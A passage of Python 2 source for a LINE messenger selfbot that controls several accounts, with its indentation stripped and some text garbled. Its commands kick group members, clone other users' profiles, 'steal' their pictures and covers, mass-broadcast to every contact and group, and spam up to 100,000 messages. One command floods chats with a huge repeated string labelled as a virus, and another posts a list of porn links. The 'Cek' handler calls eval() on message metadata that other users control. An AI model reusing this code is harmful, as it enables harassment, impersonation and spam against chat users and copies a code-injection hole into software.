if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio" + string)
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio" + string)
elif ("Gname: " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gname: ","")
cl.updateGroup(group)
else:
cl.sendText(msg.to,"Tidak Dapat Mengubah Nama Grup")
elif "Kick: " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick: ","")
cl.kickoutFromGroup(msg.to,[midd])
elif msg.text in ["Invite:","ดึง:"]:
if msg.from_ in admin:
midd = msg.text.replace("Invite: ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "My @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("My @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy1 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy1 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki.cloneContactProfile(target)
ki.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy2 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy2 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki2.cloneContactProfile(target)
ki2.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy3 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy3 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki3.cloneContactProfile(target)
ki3.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy4 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy4 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki4.cloneContactProfile(target)
ki4.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy5 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy5 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki5.cloneContactProfile(target)
ki5.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["backup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
elif msg.text in ["Backup"]:
try:
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
ki.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
ki.sendText(msg.to, str (e))
elif "Bc:ct " in msg.text:
bctxt = msg.text.replace("Bc:ct ", "")
a = cl.getAllContactIds()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:ct " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:ct ", "")
b = ki.getAllContactIds()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getAllContactIds()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getAllContactIds()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getAllContactIds()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getAllContactIds()
for manusia in f:
ki5.sendText(manusia, (bctxt))
elif "Bc:grup " in msg.text:
bctxt = msg.text.replace("Bc:grup ", "")
a = cl.getGroupIdsJoined()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:grup " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:grup ", "")
b = ki.getGroupIdsJoined()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getGroupIdsJoined()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getGroupIdsJoined()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getGroupIdsJoined()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getGroupIdsJoined()
for manusia in f:
ki5.sendText(manusia, (bctxt))
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif msg.text in ["me","Me","คท","กู"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
# elif msg.text in ["me","Me"]:
# msg.contentType = 13
# msg.contentMetadata = {'mid': msg.from_}
# cl.sendMessage(msg)
# print "SUKSES -- SEND CONTACT"
elif cms(msg.text,["แอดมิน","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': admin}
cl.sendText(msg.to," My Creator ")
cl.sendMessage(msg)
cl.sendText(msg.to," Dont Kick out From group ")
# msg.contentType = 13
# msg.contentMetadata = {'mid': admin}
# cl.sendText(msg.to," My Creator ")
# cl.sendMessage(msg)
# cl.sendText(msg.to," Dont Kick out From group ")
elif "Inviteme: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("Inviteme: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
elif msg.text in ["Clear grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
gid = ki3.getGroupIdsJoined()
gid = ki4.getGroupIdsJoined()
gid = ki5.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot Sudah Keluar Di semua grup")
else:
cl.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Ginfo","เชคกลุ่ม"]:
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
elif msg.text == "ไวรัส01":
cl.sendText(msg.to,"หยุดดดดดด....\nขอให้ทุกคนอยู่ในความสงบ\n\n 1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1\n\nMakasih Sudah Dilihat :)\nJangan Dikick ampun mzz :v")
elif ".music" in msg.text.lower():
songname = msg.text.lower().replace(".music","")
params = {"songname":" songname"}
r = requests.get('https://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
cl.sendMessage(msg.to, song[4])
elif ".Youtube " in msg.text:
query = msg.text.replace(".Youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&List' not in a['href']:
cl.sendText(msg.to,'http://www.youtube.com' + a['href'] + a['title'])
elif "Block @" in msg.text:
if msg.toType == 2:
print "[block] OK"
_name = msg.text.replace("Block @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.blockContact(target)
cl.sendText(msg.to, "Success block contact~")
except Exception as e:
print e
elif msg.text.lower() == 'blocklist':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
#===============================================
elif msg.text in ["Invite on","เชินเปิด"]:
if msg.from_ in admin:
wait["ricoinvite"] = True
random.choice(KAC).sendText(msg.to,"🌟เปิดเชิญด้วยคอนแทค🌟")
elif msg.text in ["Invite off","ปิดเชิน"]:
if msg.from_ in admin:
wait["ricoinvite"] = False
random.choice(KAC).sendText(msg.to,"🌟ปิดเชิญ🌟")
#===============================================
elif ("Cek " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif msg.text in ["Mid","ไอดี"]:
cl.sendText(msg.to, msg.from_)
elif msg.text in ["Link on","เปิดลิ้ง"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open")
else:
cl.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group ô€œô€„‰👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œô€„‰")
elif msg.text in ["Link off","ปิดลิ้ง"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close👈")
else:
cl.sendText(msg.to,"URL close👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group 👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œ")
elif msg.text in ["url","Url"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
else:
cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif msg.text in ["Gurl","ลิ้ง"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["list"]:
gs = ki.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki.getGroup(i).name + " | [ " + str(len (ki.getGroup(i).members)) + " ]")
ki.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S2glist"]:
gs = ki2.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki2.getGroup(i).name + " | [ " + str(len (ki2.getGroup(i).members)) + " ]")
ki2.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S3glist"]:
gs = ki3.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki3.getGroup(i).name + " | [ " + str(len (ki3.getGroup(i).members)) + " ]")
ki3.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S4glist"]:
gs = ki4.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki4.getGroup(i).name + " | [ " + str(len (ki4.getGroup(i).members)) + " ]")
ki4.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S5glist"]:
gs = ki5.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[���] %s \n" % (ki5.getGroup(i).name + " | [ " + str(len (ki5.getGroup(i).members)) + " ]")
ki5.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text == "ลิ้ง":
ki.sendText(msg.to,"nekopoi.host")
ki.sendText(msg.to,"sexvideobokep.com")
ki.sendText(msg.to,"memek.com")
ki.sendText(msg.to,"pornktube.com")
ki.sendText(msg.to,"faketaxi.com")
ki.sendText(msg.to,"videojorok.com")
ki.sendText(msg.to,"watchmygf.mobi")
ki.sendText(msg.to,"xnxx.com")
ki.sendText(msg.to,"pornhd.com")
ki.sendText(msg.to,"xvideos.com")
ki.sendText(msg.to,"vidz7.com")
ki.sendText(msg.to,"m.xhamster.com")
ki.sendText(msg.to,"xxmovies.pro")
ki.sendText(msg.to,"youporn.com")
ki.sendText(msg.to,"pornhub.com")
ki.sendText(msg.to,"anyporn.com")
ki.sendText(msg.to,"hdsexdino.com")
ki.sendText(msg.to,"rubyourdick.com")
ki.sendText(msg.to,"anybunny.mobi")
ki.sendText(msg.to,"cliphunter.com")
ki.sendText(msg.to,"sexloving.net")
ki.sendText(msg.to,"free.goshow.tv")
ki.sendText(msg.to,"eporner.com")
ki.sendText(msg.to,"Pornhd.josex.net")
ki.sendText(msg.to,"m.hqporner.com")
ki.sendText(msg.to,"m.spankbang.com")
ki.sendText(msg.to,"m.4tube.com")
ki.sendText(msg.to,"brazzers.com")
#-----------------------------------------------------------
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------------------
elif "Speed" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif "Sp" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif msg.text.lower() == 'respons':
profile = ki.getProfile()
text = profile.displayName
ki.sendText(msg.to, text)
profile = ki2.getProfile()
text = profile.displayName
ki2.sendText(msg.to, text)
profile = ki3.getProfile()
text = profile.displayName
ki3.sendText(msg.to, text)
profile = ki4.getProfile()
text = profile.displayName
ki4.sendText(msg.to, text)
profile = ki4.getProfile()
